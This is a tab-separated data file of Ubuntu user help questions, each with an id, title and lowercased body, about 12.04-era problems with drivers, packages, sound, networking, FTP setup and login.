140433	error during installation of gfx driver : `` no package 'libdrm_intel ' found ''	major noob question , i fear ... i 'm trying to install an intel xf86 graphics driver ( for an integrated intel g33 gfx chipset ) in 12.04 and come up with the following error : checking for drmintel ... no configure : error : package requirements ( libdrm_intel > = 2.4.29 ) were not met : no package 'libdrm_intel ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables drmintel_cflags and drmintel_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . over on `` lunar linux '' i 've found reference to the same error ( reported under slightly different circumstances ) and reference to a different but similar error which are allegedly `` solved by recompilation of cairo '' . no idea what the latter really means , but i found this on the cairo homepage : sudo apt-get install libcairo2-dev which installed ok , but does n't solve the problem . so i do n't know if that command did n't recompile it , or whether it did , but i have a different problem . what to do now ?
140440	linux firefox error : `` unable to draw ''	when i enter firefox www.google.com on the command line , linux returns `` no display specified '' . so i type export display=:0 . when i next repeat the above firefox command , linux returns `` unable to draw '' . what does this error mean and how can i correct it ? am i missing some application for use with firefox ? thanks for your help . julianloui
140451	how to create bootable pendrive without ubuntu , windows , and other weird stuff ?	ok i have a linux box , i have syslinux installed there . i do n't have any ubuntu box , and any windows . i know how to use cp , and dd , and what you want . now i like to try ubuntu on netbook without cdrom . my way to create bootable pendrive which works everytime is to use syslinux : # mount -t iso9660 -o loop , ro /image.iso /mnt/cdrom/ # mount -t vfat /dev/sdb1 /mnt/pen/ # cp -r /mnt/cdrom/* /mnt/pen/ # mv /mnt/pen/isolinux/isolinux.cfg /mnt/pen/isolinux/syslinux.cfg # mv /mnt/pen/isolinux /mnt/pen/syslinux # sync # umount /mnt/pen/ # syslinux /dev/sdb1 it is allways working , but not with ubuntu image : /
140453	in gnome shell how can i remove activities button keeping the hot corner behaviour ?	i 'm using ubuntu 12.04 with gnome shell . i want to remove the activities button , but keeping the top left hot corner behavior . there are a couple shell extensions that do just the opposite , but i ca n't find out how to do what i want . does anyone know how to solve that ?
140454	how can i get sound on headphones without switching back to 'speakers ' manually ?	on my notebook ( with realtek alc269vb ) the sound over speakers works well until i plugin the headphones , speakes get muted as expected but no sound on headphones . i noticed that as soon as i plugin the headphones , alsamixer , ubuntu sound control and pavucontrol switched to 'headphones ' which have no effect ( does not really exist ) . when i switch back to 'speakers ' everything is fine ; i can control the sound of headphones . this is a kind of work-around ( starting pavucontrol to switch from headphones to speakers ) but not relly satisfying . my complete sound configuration and a screenshot of alsamixer . you may notice that alsamixer says 'intel cougarpoint hdmi ' instead of 'intel hda realtec alc269vb ' what it did two days ago . anyway , i could n't find any differences between it . my question : in order to easy the work-around : is there a command line option to switch to 'speakers ' ?
140455	desktop file for my python gtk3 app does not load the app	i am creating an gtk3 python application for ubuntu . at the moment the application installs in the following locations . in /opt/nstrain folder where nstrain is the name of my application . the nstrain folder has the executable .py files , its icons , gui files and other library files . it also installs a .desktop file to /usr/share/applications folder . here are the contents of my .desktop file , [ desktop entry ] name=nstrain x-gnome-fullname=nstrain comment=train scheduler application categories=gnome ; utility ; exec=/opt/nstrain/nstrain.py icon=/opt/nstrain/app-icon.png terminal=false type=application i see my application in the application lens with the appropriate icon . however when i click it , nothing happens . the nstrain.py file is executable and works fine when i execute it from the terminal using ./nstrain.py command . what is the issue here ?
140467	banshee is ignoring id3 tags ?	i spent a lot of time cleaning up my id3 tags with easytag but i do n't see that cleanup reflected in banshee . if i quit easytag and re-open it , my work is reflected there . if i open an album and run id3 -l at the command line , i see my work reflected there , too ( ie . the tags are right ) but i 'm still seeing those files listed in banshee as `` unknown artist '' / `` unknown album '' -- no amount of rescan music library has any affect .
140471	is there a list of all the possible configuration options for lightdm ?	every time i want to customise lightdm i find it frustrating that there is no obvious list of configuration options i could use in /etc/lightdm/lightdm.conf . perhaps someone here knows where there is a definitive list of possible options ?
140473	why did totem stop supporting dlna ?	argh , iâve been watching all my videos over my network for years , now what do i do ? seems like a backwards move , as even my new tv can now play video off my dlna server .
140474	rhythmbox unity plugin ( control panel ) not working	when i start rhythmbox by clicking the play button in unity control panel ( the load gif ) , or start it manually , the rhythmbox unity plugin does not work . the control panel keeps in the loading state forever . idk what to do , the load state remains until i reboot the pc .
140476	canon powershot does n't show up as a device in picasa	i 'm using 11.10 desktop x64 and picasa . i was using the latest stable linux edition , and found that although my canon powershot was recognized and usable with the os ( and fspot ) , picasa would n't show it as a device from which pictures could be imported . i 've tried upgrading to picasa 3.9 ( using instructions on this forum ) , and the problem persists . any ideas as to what the problem might be ?
140480	install spark 2.6.3	i have ubuntu 12.04 64 bits . when i try to run spark 2.6.3 i get up the next error : admini @ localhost : ~/spark $ sh starter preparing jre ... starter : 150 : starter : bin/unpack200 : not found error unpacking jar files . aborting . you might need administrative priviledges for this operation . in version 11.10 running smoothly . not sure what is happening .
140489	how to edit synaptics configuration ? xorg.conf way doese n't work	i need to bind the tapbutton3 as central mouse button so i do : synclient tapbutton3=2 it works great but when i restart or wake up from suspension it forgets the setting . i know that i have to create the xorg.conf as follows section `` inputclass '' identifier `` touchpad catchall '' driver `` synaptics '' matchistouchpad `` on '' option `` tapbutton3 '' `` 2 '' endsection but this doese n't work . anyone can help me ? ... please ?
140491	hard drive overheating on an asus k53sv	hello i am new to linux and using edubuntu 12.04 lts 64 bit from past 7 days , on my laptop ( asus k53sv . core i7,8gb ram,750 gb , nvidia gt 540 m. ) i have managed to solve nvidia 's optimus driver problem ( over heating in ubuntu ) using bumblebee and its quiet stable now with 49-55 deg c processor temp , the only problem is with my hard disk it seems like overheating while i am using ubuntu , with windows 7 its running cool @ 34-36 deg c , but when ever i am switching to ubuntu its like 40-44 deg c. i read in some pages that ubuntu may harm laptop hard drive and battery status . the problem is about `` load cycle count '' is that so ? ? http : //www.theinquirer.net/inquirer/news/1038568/ubuntu-eats-laptop-hard-drive http : //www.dvhardware.net/article22922.html please please please tell me if there 's any way to solve this hdd overheating problem ? or i should avoid ubuntu for my laptop ? ? ? p.s i am using edubuntu 12.04 64 bit lts . release 12.04 ( precise ) 64-bit . kernel linux 3.2.0-24-generic . gnome 3.4.1
140492	how to use vsftpd to set up an ftp server and how to access that server from another computer ?	this is my first attempt at using any linux based system . this is also my first attempt at setting up an ftp server . i 'm running ubuntu 12.04 on a 10 year old desktop that i hope to use as a server for transferring files between myself and my friends who use both windows and mac sytems . i 've vsftpd installed and i think i 've configured my /etc/vsftpd.config file to require users to log on ( meaning no anonymous users ) and have it set up to require ssl ( whatever that means , everyone just says to do it to prevent people from sniffing your password since ftp is n't encrypted by itself ) . however , it would be great if someone could give me a set of layman 's instructions on how to configure the server to require a user name and password to access it , since i have no idea if the configuration i have setup right now will work . now comes the part that i really do n't understand . how do i now turn vsftpd on and make the server start working ? how do i know that it is on ? ( the lack of a gui makes all this very difficult for me . ) how do i connect to the server from another computer ? is it possible to use a web browser or do i have to use a program like filezilla to access the server ?
140497	virtualbox guests no longer getting shortcuts ?	i 've been using virtualbox with ubuntu for a few years now , and i 've noticed a change in behavior of keyboard shortcuts sometime recently , possibly after a new version update : in the past , when the guest had the keyboard focus , i was unable to use most of the host 's keyboard shortcuts , such as switching virtual desktops ; i had to either click on the host desktop , if i could , or , i later found , i could use awn ( in the auto-hide mode ) to make use of its desktop switcher applet . however ... now i can no longer get the guest keyboard shortcuts to work at all . none of them will work any longer , even with the same vms i 've always used . i have n't found any settings for this , which would be ideal , as i can see some situations where this would be a feature , but overall , i 'd like them to work like they did previously , where i was able to do things like switch virtual desktops or run a terminal with a hotkey .
140498	dash appears to run but is not visible	i 've an issue in an ubuntu install that was upgraded to 12.04 . recently the unity launcher is behaving strangely : left-clicking the dash icon changes the title bar and a triangle appears next to it , suggesting that it is running but nothing else can be seen , it does not respond to keyboard input either . using the `` super '' key produces the same result ( or lack of thereof ) . right clicking on the dash icon only shows `` dash home '' and it has the same non-effect as above . the red line is something new that was n't there when the `` dash home '' button worked correctly ( yes this worked after the initial upgrade but broke later ( cause unknown ) . the suggested solution sudo compiz -- replace revives the `` dash home '' button ( -- restart complains about already having a window manager ) but it also breaks the window manager and the terminal window used to issue it becomes an orphan among other things . curious to hear what the reason for the behavior might be and what could bring it back to normal function again ?
140503	does ubuntu support 8gb of ram ?	i 've a motherboard that can accept 8g ram , but window only see and use 4g ram . if i put in my 8g ram sticks , will installing a 64bit version of ubuntu really access most of the 8g 's , or is this a pipe dream ? system specs : intel core 2 q6600 quad intel motherboard dg965wh 4g ram ( currently installed ) 1tb ( 2 disks ) vista x64 ati radeon hd5670
140508	privacy feature in 12.04 doesnt work ?	i noticed my recent documents folder is showing recent activity.so i go to system settings , click privacy , set it to all for forget activity , click delete history and set record to off.long story short it doesnt work.when i open privacy up again it s set to default settings once again.anyone know how to fix this ? it s not erasing recent history as well
140510	libssl dependencies	alright , so i was messing around with libssl and i manged to mess up libssl pretty well . it looks like i installed a separate version of libssl 64 than i 've for libssl32 and now i ca n't use apt-get at all . output of sudo apt-get install -f : $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following package was automatically installed and is no longer required : libssl1.0.0 : i386 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libssl1.0.0 : i386 the following packages will be upgraded : libssl1.0.0 : i386 1 upgraded , 0 newly installed , 0 to remove and 7 not upgraded . 4 not fully installed or removed . need to get 0 b/1,004 kb of archives . after this operation , 23.6 kb of additional disk space will be used . do you want to continue [ y/n ] ? y e : internal error , no file name for libssl1.0.0 output of sudo apt-get upgrade : $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libssl1.0.0 : breaks : libssl1.0.0 : i386 ( ! = 1.0.1-4ubuntu5 ) but 1.0.0e-2ubuntu4.5 is installed libssl1.0.0 : i386 : breaks : libssl1.0.0 ( ! = 1.0.0e-2ubuntu4.5 ) but 1.0.1-4ubuntu5 is installed e : unmet dependencies . try using -f output of sudo dpkg -- configure -a : $ sudo dpkg -- configure -a dpkg : error processing libssl1.0.0 ( -- configure ) : libssl1.0.0 : amd64 1.0.1-4ubuntu5 can not be configured because libssl1.0.0 : i386 is in a different version ( 1.0.0e-2ubuntu4.5 ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.5 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5 ) dpkg : dependency problems prevent configuration of openssl : openssl depends on libssl1.0.0 ( > = 1.0.1 ) ; however : package libssl1.0.0 is not configured yet . dpkg : error processing openssl ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libssl-dev : libssl-dev depends on libssl1.0.0 ( = 1.0.1-4ubuntu5 ) ; however : package libssl1.0.0 is not configured yet . dpkg : error processing libssl-dev ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libssl1.0.0 libssl1.0.0 : i386 openssl libssl-dev any help would be appreciated !
140513	how can i regain admin privileges ?	i 'm very new to linux so i do n't understand a lot of the terms you guys use . i need a basic answer on why i keep getting admin group does not exist . i accidentally changed my initial account from admin to a standard user and i do not have admin privileges anymore . how can i recover from this . please explain this in very basic terms for me . i tried some of the answers given but none of them helped me .
140514	kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) after restart	i 'm so new to linux and suddenly found the error message appear on a running server after reboot from console . kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) here 's the boot info script result .
140516	dpkg dependencies for a custom ubuntu cd	recently i have been working on some projects where i need to add extra packages to default ubuntu install cds . i have managed to add these packages successfully and make their icons show up on the unity sidebar after the user finishes installing off the cd . however , when adding these new packages , i have found that sorting out their dependencies has been painful . if a new package has dependencies a , b , c and d , and everything except d is included on the on-cd repositories , the installer wizard will error-out unless d is included on the cd , even if the internet is connected ( please correct me if my analogy is wrong ) . in this case , adding d is easy . but sometimes debian packages have dozens upon dozens of dependencies , and figuring out whether they are included on the cd by hand is cumbersome and time consuming . sometimes i accidentally miss a dependency and only find out later when the installer cd errors out . i 'm thinking there has to be an easier way to do this . does anybody have any ideas ? andrew
140520	handling old kernels with automated upgrades	for security purposes i 've been a fan of unattended-upgrades , using something like this : unattended-upgrade : :allowed-origins { `` ubuntu lucid-security '' ; } ; unattended-upgrade : :package-blacklist { } ; unattended-upgrade : :mail `` me @ myco.com '' ; unattended-upgrade : :automatic-reboot `` false '' ; however , i 've just spent most of the day recovering from a situation . i think the root cause were : the /boot partition had filled up with a series of about 20 kernels . the most recent kernels on the boot menu may in fact never have been used i 've seen a post about a command to clean up old kernels , but would much prefer a built-in feature . i'am happy with automated updates , but what do others recommend for : clearing of the old kernels arranging an automated reboot when required ( at a configured time like 3am and should this stuff not be part of unattended-upgrade ?
140524	where do javadocs get installed	i installed libguava-lib-doc from the ubuntu store . but i ca n't figure out where it installed . where are the docs , and how can i figure this out in general in the future ?
140531	finding all other workstations on the network	at my home i have both workstations directly use ethernet cables to connect to router , and also a few laptops/mobile devices that connect to wifi . is there a command in linux to see list of all devices accessing wifi/network ? thanks in advance , sorry for bad english .
140532	upload breaks after 3203 inserts	i upload a textfile with approx 30'000 lines into a mysql-db . the upload breaks allways after exactly 3203 lines . a splitted file with less then 3203 lines runs fine . the problem is , for sure , not at line 3203 . rather in a mysql-configuration ( for example max_nbrs_of_inserts ) lines looks as follow : ... 09.01.92,06:59:27 , 34,1322 , 31 , 2,06:59:27,00:00:00 , 16.00 , 0.00 ... each of this lines will generate a sql-input statment as the following example : $ query = `` insert into tmp_gf ( fldgfdatumzeit , fldnummer , fldrespond , fldgfp , fldbesnr , fldbeginn , flddauer , fldvorrat , fldverzehr , fldsave , fldzeig ) values ( ' $ gfdatumzeit ' , $ nummer , $ respond , $ gfp , $ besnr , ' $ beginn ' , ' $ dauer ' , $ vorrat , $ verzehr , 0 , ' $ zeig ' ) `` ; php.ini and upload-script settings : ini_set ( 'upload_max_filesize ' , '10m ' ) ; ini_set ( 'post_max_size ' , '10m ' ) ; ini_set ( 'max_input_time ' , 3000 ) ; ini_set ( 'max_execution_time ' , 3000 ) ; ubuntu version 11.10 mysql version protocol_version 10 version 5.1.58-1ubuntu1
140533	how to improve performance of intel gma 4500 for better gamming experience ?	i only own a laptop , and it has integrated graphics ( blah ) . the card is an intel gma 4500 . back on windows , i was able to edit some parameters for the graphics . here is a video of what i used to use to edit those parameters . can such a thing be done on ubuntu ? i want to improve my card so i can play some games better .
140539	login manager does not have a selection for other user	i have a problem with the login manager of ubuntu 12.04 , it does not have a selection to login another user ; instead it only allows administrator and guest . can you help me with this problem ?
140540	rtl8111/8168b not worked properly in 12.04	few days ago i install new version of ubuntu ( 12.04 lts ) on my pc . this was clean install . i 've next network integrated card and it 's not work : ( . below information about my nic : lspci -v 06:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) subsystem : giga-byte technology ga-ep45-ds5 motherboard flags : bus master , fast devsel , latency 0 , irq 43 i/o ports at de00 [ size=256 ] memory at fbeff000 ( 64-bit , prefetchable ) [ size=4k ] memory at fbef8000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8168 kernel modules : r8168 i 've investigate issue and found that by default kernel using r8169 module for this card and people change it on native realtek drivers . http : //code.google.com/p/r8168/ - mirror of official drivers on google code . but it 's not help in my case . could anyone help me with this issue ? thanks in advance .
140541	chromium maximizes when i change workspaces	every time i switch from one workspace to another and then back , chromium somehow manages to automatically maximize itself . after a while , it crashes unity somehow . i am using ubuntu 12.04 . the problem goes away and then returns ... and then goes away ... and then returns ... repeatedly as well .
140544	is there a way to quickly change all the file extensions of all files in a folder ?	i have a large folder of .m4b audio books which in their current format wo n't play on my android phone . however they do work fine if they are renamed to .m4a is there a quick method or terminal command that can rename every .m4b file in a folder to .m4a ? there is no need for any conversion of the files , simply renaming the file extension works perfectly fine .
140552	how to make glade load translations from /opt	i 've created an application that i 'd like to submit through the ubuntu app developer process . one of the requirements for the process is that when installed , all files go into the /opt/extras.ubuntu.com/ < appname > directory . through changes in packaging and with help from others i 've achieved that , but now i 'm facing a new problem : when running from /opt the translations from my app are not being loaded . what happens is the following : unless specified otherwise , the binary files ( mo files ) containing translations for an application are loaded from /usr/share/locale ( or in the case of ubuntu , from /usr/share/locale-langpack ) , but in my app , due to the /opt requirement , they are installed in /opt/extras.ubuntu.com/qreator/locale . that 's in theory fine , as gettext allows specifying an alternative location to load translations , so i add the bindtextdomain call to achieve that : import gettext from gettext import gettext as _ gettext.bindtextdomain ( 'qreator ' , '/opt/extras.ubuntu.com/qreator/share/locale/ ' ) gettext.textdomain ( 'qreator ' ) that works well up to a point : all messages that are output on the command line then appear translated as expected . but it does not solve the main problem : to load the translations from the ui glade requires specifying the translation domain once more ( the equivalent to the gettext.textdomain ( 'qreator ' ) call above ) , but it does not let specifying where to load translations from ( i.e . the glade equivalent to bindtextdomain , which sadly does not exist ) . here 's an extract of the code that i 'm using : builder = gtk.builder ( ) builder.set_translation_domain ( 'qreator ' ) # there is n't a way to tell glade to load translations from # somewhere else than /usr/share/locale here builder.add_from_file ( ui_filename ) this essentially means that translations from the ui can not be loaded if your app is installed in /opt . i 'm pretty much stuck at this point . any ideas on how to make glade load translations from /opt/extras.ubuntu.com/qreator/share/locale/ instead of /usr/share/locale ?
140555	skype resets and forgets password , eula signing after reboot	i have xubuntu 12.04 running on a macbook air 4,1 . i use skype ( installed via downloading the .deb and sudo dpkg -i < skype > .deb ( it 's the ubuntu 10.4 64bit version ) . everytime i reboot , skype starts by showing the end user license agreement . if i hit `` agree '' , i see my skype name but i still have to put in the password ( although before the reboot , i set it to be remembered ) . needless to say , that 's quite tedious . i also tried rm ~/.skype/ < myskypename > /profile*.dbb , but that did not help .
140557	nvidia drivers not working on toshiba ac100	i had ubuntu 11.10 working well on this netbook , but i decided to upgrade to the latest release . i followed official ubuntu wiki tutorial and managed to install the system correctly . what bugs me , is that i ca n't get the graphics driver to work . the suggested package located at https : //launchpad.net/ubuntu/+source/nvidia-graphics-drivers-tegra/12~beta1-0ubuntu1/+build/3019146/+files/nvidia-tegra_12 % 7ebeta1-0ubuntu1_armel.deb does n't work . ubuntu software center says : unkown architecture 'armel ' . with no graphic drivers , the netbook is laggy ( probably processor taking care of the graphics as well ) . what is the problem ? is there a working package , or am i doing something wrong ?
140558	12.04 lts flashplugin-installer problem	when i install flashplugin i have problem : flashplugin-installer : downloading http : //archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.2.202.235.orig.tar.gz traceback ( most recent call last ) : file `` /usr/lib/update-notifier/package-data-downloader '' , line 234 , in process_download_requests dest_file = urllib.urlretrieve ( files [ i ] ) [ 0 ] file `` /usr/lib/python2.7/urllib.py '' , line 93 , in urlretrieve return _urlopener.retrieve ( url , filename , reporthook , data ) file `` /usr/lib/python2.7/urllib.py '' , line 239 , in retrieve fp = self.open ( url , data ) file `` /usr/lib/python2.7/urllib.py '' , line 207 , in open return getattr ( self , name ) ( url ) file `` /usr/lib/python2.7/urllib.py '' , line 344 , in open_http h.endheaders ( data ) file `` /usr/lib/python2.7/httplib.py '' , line 954 , in endheaders self._send_output ( message_body ) file `` /usr/lib/python2.7/httplib.py '' , line 814 , in _send_output self.send ( msg ) file `` /usr/lib/python2.7/httplib.py '' , line 776 , in send self.connect ( ) file `` /usr/lib/python2.7/httplib.py '' , line 757 , in connect self.timeout , self.source_address ) file `` /usr/lib/python2.7/socket.py '' , line 571 , in create_connection raise err ioerror : [ errno socket error ] [ errno 113 ] no route to host ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/andale32.exe traceback ( most recent call last ) : file `` /usr/lib/update-notifier/package-data-downloader '' , line 234 , in process_download_requests dest_file = urllib.urlretrieve ( files [ i ] ) [ 0 ] file `` /usr/lib/python2.7/urllib.py '' , line 93 , in urlretrieve return _urlopener.retrieve ( url , filename , reporthook , data ) file `` /usr/lib/python2.7/urllib.py '' , line 239 , in retrieve fp = self.open ( url , data ) file `` /usr/lib/python2.7/urllib.py '' , line 207 , in open return getattr ( self , name ) ( url ) file `` /usr/lib/python2.7/urllib.py '' , line 344 , in open_http h.endheaders ( data ) file `` /usr/lib/python2.7/httplib.py '' , line 954 , in endheaders self._send_output ( message_body ) file `` /usr/lib/python2.7/httplib.py '' , line 814 , in _send_output self.send ( msg ) file `` /usr/lib/python2.7/httplib.py '' , line 776 , in send self.connect ( ) file `` /usr/lib/python2.7/httplib.py '' , line 757 , in connect self.timeout , self.source_address ) file `` /usr/lib/python2.7/socket.py '' , line 571 , in create_connection raise err ioerror : [ errno socket error ] [ errno 113 ] no route to host konfigurowanie flashplugin-installer ( 11.2.202.235ubuntu0.12.04.1 ) ...
140559	how hp prolient ubuntu server 11.0 support 4 gb	i have upgraded the server ram to 4+4= 8 gb , but after the physical installation , i restarted the server and when it came to the login prompt , it showed only 2+2 = 4 gb . please help . thanks
140561	how to unpack a tar file into a blank disk image ?	i 'm trying to unpack a tar file in to a disk image which i created . i have no idea how to do it , since the disk image .img is not a directory . can anyone give some suggestions ? by the way , i have already mounted the disk image .
140563	how to access mysql server with user password issued through libreoffice base frontend ?	when dist-upgrading ubuntu 11.10 to 12.04 updatemanager asked to enter a `` new '' user password for mysql . i denied 3 times . this asking was put misleadingly . i better should have entered a user password for me for the »myqsl« privilege system , as i know now . now my database »mysql« > table »user« does not shows a password entry for me . i can do most administrative tasks on my mysql database though . i feel that this is a security gap . i 'd like closing it . i entered a password . but now i can not access my mysql server through my libreoffice base frontend any more : `` access denied . '' how to rconcile both requirements ?
140564	installing oracle database 10g xe server in ubuntu 11.04 , `` e : unable to locate package oracle-xe ''	i have read many posts for installing oracle database 10g xe server in ubuntu , such as this but i get an error : e : unable to locate package oracle-xe when execute the command sudo apt-get install oracle-xe at the previous step ( sudo apt-get update ) , it also notices that e : some index files failed to download . they have been ignored , or old ones used instead . did any one meet and solve this problem ? i have searched for this problem but got no proper answer .
140566	how to increase downloading speed	i am using ubuntu 12.04 . and i use firefox for browsing and downloading . i would like to increase downloading speed . how can i do increase downloading speed ?
140569	how to test if package is installed ?	i want a shell script method to test/report if a package is installed . i do n't need details , only a yes/no . i 've come up with this method . is there a more direct way ? is_installed=0 test_installed= ( `apt-cache policy domy-ce | grep installed : ` ) [ ! `` $ { test_installed [ 1 ] } '' == `` ( none ) '' ] & & is_installed=1
140570	after upgrade from 10.04 to 12.04 i 'm getting minimal graphics problem	i 've updated 10.04 to 12.04 recently using do release command but now it says minimal graphics problem . internet is not working due to which i ca n't download from internet . how to update graphics in this case ?
140571	how to prevent users from installing non-free software ?	is it possible to disable installation of non-free or proprietary softwares and applications in ubuntu ?
140573	how do i create a default fallback profile for any process that does n't have one in apparmor ?	is there a way to specify a default profile on any executable that does n't have a profile already defined ? the idea is to avoid any unconstrained processes .
140577	how to install gnome shell latest version in offline-mode ?	i ca n't using sudo apt-get install gnome-shell because , my internet connection is very slow , so i want to download the packages first and copy them to my laptop .
140580	how do i go back to windows 7 from ubuntu	i had windows 7 starter on my eeepc and then made a backupimage on my portable usb drive and then got ubuntu . i like ubuntu , but it takes much of my battery and i must go back to windows 7 starter for software reasons . how do i do that ? when i go to the bootmenu with f2 i can choose the usbdrive as booting device , but nothing happens .
140586	are there known ( slow boot ) issues with dell xps17 ( l702x ) and grub ?	i just received my dell xps17 and installed it as follows : partition 1 : 100gb ntfs windows 7 partition 2 : 16gb swap partition 3 : 100gb ext4 linux / partition 4 : 536gb luks + ntfs data all four are primary partitions . i installed windows pro 64-bit first , then ubuntu 12.04 64-bit . with the windows bootloader in the mbr , the delay at the dell boot splash was barely noticeable . after grub was installed there , both windows and linux still boot smoothly from the grub menu - but to get there from the splash screen it takes about 30-40 seconds . is this a known issue with grub/dell bios/whatever and is there a solution ? ( could n't find anything directly related to my case , only if more than one hdd is used ) best regards , frederic
140597	creating physical folders and ftp account with bindings in apache2	our client wants 2 subdomains creating : mobile.website.co.uk 5thbirthday.website.co.uk i did this on the dns server pointing them to the ip where the website was hosted . i then ssh into the linux ubuntu 12.04 box and navigate using : cd /var/www/ and used sudo mkdir mobile and the same for 5thbirthday . i need to create a binding in apache2 server but how can i do this ? in the gui version of linux i edited the 'sites enabled ' file and added the physical location , default document and server ip . but how do i edit a file in ssh ? i tried the command ( within the mobile folder to practice ) touch test.txt and then edit test.txt i am able to edit the file but how do i save it ? i then need to give a user ftp access to the /var/www folder , currently they only have permissions to a random folder called , 'our-website ' which contains nothing and is obviously redundant . hope you can help
140598	pci sata controller recommendation	i want to add a couple of sata drives using a pci sata controller . do you have any recommendations for me that will work with 12.04 ?
140599	ca n't turn on or enable wireless	i 'm using ubuntu 11.10 for a couple of months . but today after restart my laptop i ca n't get wireless on . i tried to install windows wireless drivers but it did n't work too . and it 's not off by rfkill too . # rfkill list all 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : dell-wifi : wireless lan soft blocked : no hard blocked : no 2 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no when i tried # ifconfig wlan0 up wlan0 : error while getting interface flags : no such device and # lshw -c network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 05 serial : 78:2b : cb : e6:7a : ca size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8105e-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:46 ioport : d000 ( size=256 ) memory : f3204000-f3204fff memory : f3200000-f3203fff *-network unclaimed description : network controller product : centrino wireless-n 1030 vendor : intel corporation physical id : 0 bus info : pci @ 0000:09:00.0 version : 34 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress cap_list configuration : latency=0 resources : memory : f7a00000-f7a01fff *-network description : ethernet interface physical id : 2 logical name : eth2 serial : 00:1f:1f:96 : af:41 capabilities : ethernet physical configuration : broadcast=yes driver=cdc_ether driverversion=22-aug-2005 firmware=cdc ethernet device ip=192.168.2.3 link=yes multicast=yes now where is the problem and how should i solve it ?
140601	ubuntu does n't set lc_all , why ?	if you run locale on an ubuntu installation you get something like : lang=en_us.utf8 language= lc_ctype= '' en_us.utf8 '' lc_numeric= '' en_us.utf8 '' lc_time= '' en_us.utf8 '' lc_collate= '' en_us.utf8 '' lc_monetary= '' en_us.utf8 '' lc_messages= '' en_us.utf8 '' lc_paper= '' en_us.utf8 '' lc_name= '' en_us.utf8 '' lc_address= '' en_us.utf8 '' lc_telephone= '' en_us.utf8 '' lc_measurement= '' en_us.utf8 '' lc_identification= '' en_us.utf8 '' lc_all= how come lc_all is unset ? i know how to set it , but why does n't ubuntu set it automatically , like with the other lc_ 's ?
140607	how can audacity help me determine vocal range and voice type ?	is there a way to use audacity to record someone sing a song and then have a look at what musical notes a person has hit ? here is a list of what type of singers exist : soprano : c4 – c6 mezzo-soprano : a3 – a5 contralto : f3 – f5 tenor : c3 – c5 baritone : f2 – f4 bass : e2 – e4 this is why i 'd like to use audacity to tell me what notes the person hit ... so that i could determine what type of singer a person is , but i really do n't know if there is an application that analyzes singing in terms of notes .
140612	ubuntu 12.04 can not login	i am using ubuntu 12.04 . i can not login . i get to the grub menu and go root , delete my /home/user/.xauthority file and change my password . i move /home/user/.profile to /home/user/profile , reboot , and i can login ( this is fixed by moving .profile to some other name ) . but if i am idle and ubuntu displays the screensaver , i can not login . i have pressed ctrl+alt+f1 and removed /home/user/.xauthority . i check the existence of /home/user/.profile and it does not exist . there is no way for me to login to x from the keyboard connected to the box . i can ssh -cxy to the ubuntu box and login without any problem . can someone help me fix this problem ?
140615	how do i show the same content on both screens ?	i use 12.04 lts on a hp 6530b ( laptop ) and an external samsung syncmaster t220hd . it works , however - the laptop and the external monitor shoes as dual monitors and i should like to have only one monitor ( same screens on both monitors ) . how do i change this behavior ?
140616	updater offers 'linux kernel headers 3.2.0 for version 64 bit x86 smp ' for my 32 bit system	i 'm running kubuntu 12.04 on 32 bit and the updater offers a security update 'linux kernel headers ' and 'linux kernel image for version 64 bit x86 smp ' . should i install this ? and if not , why do i get the offer ?
140617	how do i use a gamepad ?	i 'm planning on buying a game-pad for playing games on emulators ( like zsnes ) and i have read a few articles on the net related to some game-pads not working in linux especially when playing games via wine . but that only for wine , right ? there are some questions in my mind , like : does that mean that all native ubuntu games work fine with any game-pads or this too has specific game-pads ? that work on ubuntu ( 12.04 ) . what if i buy a random game-pad say unofficial/fake , will it be recognize it as a game-pad or will ubuntu ignore it ? if it gets recognized how will i/it find the appropriate drivers required for using the hardware ? or will drivers not be necessary and i can start playing , right after i bought it and plugged it in ?
140624	package has unmet dependencies : gnome-shell-extensions-user-theme	i followed the instructions from here but i got the following error when trying to install gnome-shell-extensions-user-theme : the following packages have unmet dependencies : gnome-shell-extensions-user-theme : depends : gnome-shell-extensions-common but it is not going to be installed extra information : running ubuntu with gnome3
140638	multiple panels appear when restart or log-in	when i log-in or restart a gnome session all of the items in my panels are duplicated . i get an additional 'applications ' and 'places ' menus , additional screens buttons and additional top and bottom panels . i have tried alt + right clicking but this is only a temporary fix .
